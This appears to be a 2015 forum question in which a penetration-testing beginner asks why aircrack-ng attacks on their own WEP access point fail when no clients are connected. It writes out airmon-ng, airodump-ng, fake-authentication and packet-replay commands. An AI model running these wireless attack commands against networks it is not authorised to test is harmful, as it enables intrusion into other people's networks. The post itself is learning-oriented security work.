Airodump-ng & Aireplay-ng: No packets from AP

2

I'm pretty new to penetration testing and I'm trying to learn how to correctly use airodump-ng with aireplay-ng to break through WEP encryption on my AP.

I have managed to get the password with clients attached to the AP by reinjecting ARP packets to collect IVs. I read an article on aircrack-ng.org about how to crack WEP with no wireless clients, but it doesn't seem to work for me. I have tried to listen for any packets to reinject, but with no clients connected the AP seems to be silent. Is there any way to force the AP to send a packet without connecting a client to the network, or is there any other way to break through the encryption?

I have also noted that some networks that are listed with airodump-ng are reported with signal strength -1. I assume this means that they are too far away. Am I correct in my assumption?

I am using the aircrack-ng suite on Arch Linux and the ESSID is broadcast.

Commands I'm using:

airmon-ng start [wlan interface]

airodump-ng -w outputfile -c [channel] --bssid [mac_of_ap] [monitor interface]

Fake auth:

aireplay-ng -1 0 -a [BSSID of AP] -h [Mac of wireless card]

or to continuously reassociate with the AP:

aireplay-ng -1 6000 -o 1 -q 10 -e [Essid] -a [mac_of_ap] -h [Mac of wireless card] [monitor interface]

This command was supposed to take the first packet the AP sends and then reinject it:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [BSSID of AP] -h [Mac of WIC] mon0

Jimmy

Posted 2015-05-03T07:30:24.980

Reputation: 133

Can you post the exact command that you are trying to run? – tlng05 – 2015-05-04T01:16:27.750

No answers